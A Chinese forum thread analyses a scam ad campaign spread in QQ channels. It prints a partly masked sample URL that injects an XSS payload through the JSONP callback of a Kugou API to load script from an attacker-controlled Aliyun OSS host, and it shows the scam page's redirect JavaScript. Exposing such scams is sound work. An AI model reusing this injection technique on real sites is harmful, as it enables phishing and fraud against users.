設置 | 登錄 | 註冊

目前共有18篇帖子。

最近幾個qq頻道都看到這樣的廣告(虛假)

1樓 star 2025-8-16 22:39
Rt
2樓 star 2025-8-16 22:42
3樓 star 2025-8-16 22:42
4樓 star 2025-8-16 22:45
6樓 star 2025-8-16 22:48
可以看到是通過callback的時候注入js來實現的
7樓 star 2025-8-16 22:52
連結樣本:https://fx1.service.kugou.com/fx/timemachine/web/video/music/view/current.json;BptVdOEe?_p=0&jsonpcallback=*********%E5%BF%83&starId=1869700074&needHttps=1xxx%3Cbody%2Fhidd********g%2Fonload%3DsetT********7Bwith(document)body.appendChild(createElement(%60script%60)).src%3D%60%2F%2***20*5rkkk.oss-cn-hangzhou.aliyuncs.com%2Ff83945%60%7D%2C0)%3E&roomId=5836125&playuuid=418337196428721473&vertical=1&leygw0Th=CHvRDYio&rr=1737302142772****
8樓 star 2025-8-16 22:54
原理分析:1. 通過酷狗官方接口,本是用來打開一個json文件,但是在callback里注入了js xss攻擊代碼,跳轉到新的*騙網站連結
star獲取一個js執行,把當前窗口href改為真正的*站連結
star而且會判斷是否ua是電腦的,如果是電腦直接跳轉到qq下載界面
啊啊是谁都对回復 @star:竟然還有這一步,真是相當的以假亂真了
star回復 @啊啊是誰都對:還有呢
10樓 star 2025-8-16 23:09

function isMobileQQ() {

        var ua = navigator.userAgent.toLowerCase();

        var isMobile = /iphone|ipod|ipad|android|harmonyos/i.test(ua);

        var isQQBrowser = /qq/i.test(ua);

        var isIOSQQ = /iphone|ipod|ipad/i.test(ua) && /qq/i.test(ua);

        var isAndroidQQ = /android/i.test(ua) && /qq/i.test(ua);

        var isHarmonyOSQQ = /harmonyos/i.test(ua) && /qq/i.test(ua);

        return isMobile && isQQBrowser && (isIOSQQ || isAndroidQQ || isHarmonyOSQQ);

    }

    if (isMobileQQ()) {


    } else {

        top.location.href="https://im.qq.com/index/#downloadAnchor";

    }

    mqq.ui.setWebViewBehavior({

        swipeBack:0

    })

star可以看到如果不是手機,直接轉到qq下載頁面
11樓 star 2025-8-16 23:12
最終圖片資源指向   https://2025rkkk.oss-cn-hangzhou.****yuncs.com/ 為aliyun OSS存儲地址
12樓 star 2025-8-16 23:42
https://2025rkkk.oss-cn-hangzhou.aliyuncs.com/index.html?1755358585303 (最終html文件下載連結地址)(已留樣)

內容轉換:

回覆帖子
內容:
用戶名: 您目前是匿名發表。
驗證碼:
看不清?換一張
©2010-2025 Purasbar Ver3.0 [手機版] [桌面版]
除非另有聲明,本站採用知識共享署名-相同方式共享 3.0 Unported許可協議進行許可。